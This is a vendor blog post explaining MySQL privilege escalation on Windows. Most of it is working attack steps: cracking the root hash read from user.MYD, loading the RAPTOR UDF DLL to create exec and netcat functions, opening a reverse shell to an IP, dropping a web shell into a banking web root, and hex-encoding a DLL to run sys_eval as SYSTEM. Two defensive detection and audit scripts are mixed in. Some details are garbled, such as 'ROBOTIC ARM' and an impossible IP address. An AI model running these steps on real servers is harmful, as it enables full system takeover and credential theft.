Bobcares

MySQL Privilege Escalation Windows: Explained

by | Jul 26, 2022

Let’s look at MySQL privilege escalation in Windows in detail.

We can oversee and handle your MySQL privilege escalation issues in Windows at Bobcares with our MySQL support Service.

Do you want to know more? Continue reading and contact us if you have any additional queries.

MySQL Privilege escalation


An attacker can read the root password hash from the MySQL database if the administrator forgot to restrict permissions on the "DATA" folder after installing MySQL on Windows.

Example
  1. Go to: C://program files/mysql5.0.45/data/mysql
  2. Read the file user.MYD
  3. Crack it using Cain & Abel or any other available tool. root*7B665519FA4B5D860C1DD4E4D40BBCB624ED2B7E

    The data is readable and crackable. For instance, the cracked hash above yields "Root:4321d".

An attacker can also take advantage of the "RAPTOR" exploit, which adds a dynamic library to MySQL and then uses it. This library acts as a trojan (reverse shell, netcat) and infects the target machine.

RAPTOR

By loading dynamic libraries that contain User Defined Functions (UDFs), MySQL offers a mechanism through which its standard set of functions can be extended. If MySQL itself runs with root privileges, the UDF mechanism enables an attacker to install and run malicious code as root. This is one of the primary ways to perform the

To connect to MySQL, a user can use an [asp, php,…] shell, phpMyAdmin, or a terminal (I connected using MySQL Shell in this example).

Download RAPTOR on Windows

A user can download Raptor on Windows in a few simple steps, as shown below. First, the user has to download the archive from: http://www.0xdeadbeef.info/exploits/raptor_winudf.tgz

c:\mysql> mysql -h 192.168.0.203

- use mysql;
- create table foo(line blob);
- insert into foo values(load_file('c://windows//temp//winudf.dll'));
- UNLOCK TABLES;
- SELECT * FROM mysql.foo INTO DUMPFILE 'c://windows//system32//winudf.dll';
- CREATE FUNCTION netcat RETURNS integer SONAME 'winudf.dll';
- CREATE FUNCTION exec RETURNS integer SONAME 'winudf.dll';
- DROP TABLE foo;

After this, the user can verify that the functions were registered by typing: select * from mysql.func;

The user can then run commands with administrator privileges, for example:

- mysql> select exec('echo foo > c:\\bar.txt');
- mysql> select netcat('193.347.1.368');  Remember to change the address to ('192.168.0.147')
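As an added defender-side example (not part of the original post), the following Python scans MySQL general-log lines for the statement chain shown above: a load_file() read, an INTO DUMPFILE write, and CREATE FUNCTION ... SONAME on the same connection. The log lines and the simplified "time, thread id, Query, statement" format are constructed for the example, not captured from a real server.

```python
"""Detect the UDF-loading statement chain from this page in a MySQL general log.
Added example (hypothetical helper, not Bobcares' code); sample log is constructed."""
import re

# Constructed general-log excerpt: thread 12 performs the chain, thread 13 is benign.
SAMPLE_LOG = """\
2022-07-26T10:00:01.000000Z\t12 Query\tuse mysql
2022-07-26T10:00:02.000000Z\t12 Query\tcreate table foo(line blob)
2022-07-26T10:00:03.000000Z\t12 Query\tinsert into foo values(load_file('c:/windows/temp/winudf.dll'))
2022-07-26T10:00:04.000000Z\t12 Query\tSELECT * FROM mysql.foo INTO DUMPFILE 'c:/windows/system32/winudf.dll'
2022-07-26T10:00:05.000000Z\t12 Query\tCREATE FUNCTION exec RETURNS integer SONAME 'winudf.dll'
2022-07-26T10:00:06.000000Z\t12 Query\tDROP TABLE foo
2022-07-26T10:00:07.000000Z\t13 Query\tSELECT id, name FROM customers WHERE id = 42
"""

# One rule per step of the chain; every match is reported on its own.
RULES = [
    ("load_file",      re.compile(r"\bload_file\s*\(", re.I)),
    ("dumpfile_write", re.compile(r"\binto\s+dumpfile\b", re.I)),
    ("udf_create",     re.compile(r"\bcreate\s+function\b.*\bsoname\b", re.I)),
]
LINE = re.compile(r"^(\S+)\t(\d+) Query\t(.*)$")

def scan_general_log(text):
    """Return (hits, chained): per-line rule hits as (thread, rule, statement), and
    the thread ids that did a DUMPFILE write before a CREATE FUNCTION ... SONAME."""
    hits, seen_by_thread, chained = [], {}, []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # not a Query line in the expected shape
        _ts, thread, stmt = m.groups()
        for rule, pattern in RULES:
            if pattern.search(stmt):
                hits.append((thread, rule, stmt))
                seen = seen_by_thread.setdefault(thread, set())
                seen.add(rule)
                if rule == "udf_create" and "dumpfile_write" in seen and thread not in chained:
                    chained.append(thread)
    return hits, chained

if __name__ == "__main__":
    for hit in scan_general_log(SAMPLE_LOG)[0]:
        print(hit)
```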

Technical Information: Reason

MySQL 5 and later include an event scheduler comparable to SQL Agent and the job scheduler in Oracle, so there is a way to run scripted code once it is ready. It is not enabled by default.

MySQL allows the creation of procedures and functions, but since no scripting language is available, they are limited to basic loops and conditions along with SQL statements. Even writing results to disk and reading files is restricted.

However, MySQL includes a useful addition to its functionality: UDFs (User Defined Functions). These make it possible to define user functions, implement them in C++, compile them, and call them from MySQL like any other database function. Since these functions are loaded dynamically from the plugin directory (as of version 5.1) and can be used from the database normally, it is not necessary to recompile the entire database code. This paves the way for MySQL privilege escalation in Windows.

Alternative Attack Method

A user who has MySQL root privileges can use ROBOTIC ARM to move files and grant them admin privileges.

Example

- use mysql;
- create table foo(line blob);
- insert into foo values(load_file('c://windows//temp//shell.aspx'));
- UNLOCK TABLES;
- SELECT * FROM mysql.foo INTO DUMPFILE 'e://hosting//ebanking//shell.php';

Looking at a Windows installation of MySQL shows that it runs as a service with system privileges, meaning that any code running in the context of the MySQL process runs as the SYSTEM user. This is what MySQL privilege escalation refers to.

Performing the exploit

Assume the presence of a vulnerability such as an "Unauthenticated phpMyAdmin Interface". The method still works even if the user cannot access the phpMyAdmin interface but has managed to write files to the MySQL plugin directory. The path to the plugin directory must be known in order to escalate privileges on the system. Additionally, the 'dumpfile' function will be used to write files to the plugin directory.

  1. First, find the path of the MySQL plugin directory: select @@plugin_dir;
  2. The data inside the plugin/DLL file needs to be translated into hexadecimal form. This can be done with the Python one-liner below.

    python -c "from binascii import hexlify; print('select 0x' + hexlify(open('udf.dll','rb').read()).decode() + ' into dumpfile \'c:/wamp/bin/mysql/mysql5.5.20/lib/plugin/udf_test.dll\'')"

    The command above automatically builds the SQL query used in the following step.

  3. Then use the dumpfile function to write the file into the plugin directory, create the sys_eval function from it so it is loaded into the current memory context, and finally obtain code execution as SYSTEM.
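The UDF mechanism explained under "Technical Information" and the steps above point to what a defender should audit on a Windows MySQL server. This added Python helper (hypothetical, not Bobcares' or MySQL's own code) works on text captured from the server: the rows of select name, dl from mysql.func, a listing of @@plugin_dir, the value of secure_file_priv, and the Windows service account. All samples are constructed so the script runs offline.

```python
"""Audit helper for the MySQL UDF privilege-escalation chain this page describes.
Added example (hypothetical, not Bobcares' or MySQL's own code). It works on text
captured from the server, so it runs offline; all samples below are constructed."""
import re

# Function names used by command-execution UDFs (this page's exec, netcat, sys_eval
# plus their usual siblings from the same UDF families).
SUSPICIOUS_NAMES = {"exec", "netcat", "sys_eval", "sys_exec", "sys_get", "sys_set"}

# Constructed sample of `select name, dl from mysql.func` as printed with --batch.
SAMPLE_FUNC = "name\tdl\nexec\twinudf.dll\nnetcat\twinudf.dll\n"
# Constructed directory listing of @@plugin_dir.
SAMPLE_PLUGIN_DIR = ["winudf.dll", "ha_example.dll"]

def parse_func_rows(text):
    """Parse tab-separated name<TAB>dl rows, skipping the header line."""
    rows = []
    for line in text.strip().splitlines():
        parts = line.split("\t")
        if len(parts) == 2 and parts[0].lower() != "name":
            rows.append((parts[0].strip(), parts[1].strip()))
    return rows

def audit_udfs(rows, plugin_dir_listing, allowlist=()):
    """Flag registered UDFs by name, by unknown library, or by a library that is
    registered in mysql.func but no longer present in plugin_dir."""
    findings = []
    for name, dl in rows:
        if name.lower() in SUSPICIOUS_NAMES:
            findings.append(f"UDF {name} ({dl}): command-execution function name")
        elif dl not in allowlist:
            findings.append(f"UDF {name} ({dl}): library not on the allowlist")
        if dl not in plugin_dir_listing:
            findings.append(f"UDF {name}: {dl} registered but missing from plugin_dir")
    return findings

def audit_settings(secure_file_priv, service_account):
    """Settings that let INTO DUMPFILE reach plugin_dir and run the UDF as SYSTEM."""
    findings = []
    if not secure_file_priv:
        findings.append("secure_file_priv is empty: INTO DUMPFILE can write into plugin_dir")
    if re.search(r"localsystem|nt authority\\system", service_account, re.I):
        findings.append("mysqld runs as SYSTEM: any loaded UDF executes with SYSTEM rights")
    return findings

if __name__ == "__main__":
    for f in audit_udfs(parse_func_rows(SAMPLE_FUNC), SAMPLE_PLUGIN_DIR):
        print(f)
    for f in audit_settings("", "LocalSystem"):
        print(f)
```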


Conclusion

To conclude, MySQL privilege escalation in Windows refers to a user gaining privileges beyond those MySQL was meant to grant. A user can perform MySQL privilege escalation by following a simple set of steps and tools.

